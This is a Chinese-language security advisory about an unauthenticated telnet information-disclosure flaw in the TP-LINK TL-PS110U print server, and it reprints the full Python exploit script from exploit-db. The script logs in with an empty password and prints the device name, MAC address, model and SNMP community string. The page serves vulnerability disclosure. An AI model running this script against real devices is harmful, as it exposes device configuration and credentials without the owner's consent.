TP-LINK TL-PS110U打印服务器'tplink-enum.py'安全绕过漏洞
发布日期:2013-06-19
更新日期:2013-06-21
受影响系统:TP-LINK TL-PS110U
描述:
BUGTRAQ ID:
60682
TL-PS110U是一款单USB口打印服务器,它是专门针对中小型企业、学校、家庭而设计,能够很好的为局域网上所有用户提供操作简单、方便快捷的共享打印方式。
TP-LINK TL-PS110U Print Server运行telnet服务时可使攻击者不经身份验证即可访问配置信息,包括设备名、MAC地址、厂商、型号、SNMP社区字符串。
<*来源:SANTHO
链接:
http://www.exploit-db.com/exploits/26318/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
import telnetlib
import sys
host = sys.argv[1]
tn = telnetlib.Telnet(host)
tn.read_until("Password:")
tn.write("\r\n")
tn.read_until("choice")
tn.write("1\r\n")
tn.read_until("choice")
tn.write("1\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Device Name" in i:
print i.strip()
if "Node ID" in i:
print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("2\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Manufacture:" in i:
print i.strip()
if "Model:" in i:
print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("5\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Community" in i:
print i.strip()
建议:
厂商补丁:
TP-LINK
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.tp-link.com/en/products/details/?model=TL-PS110U浏览次数:3801
严重程度:0(网友投票)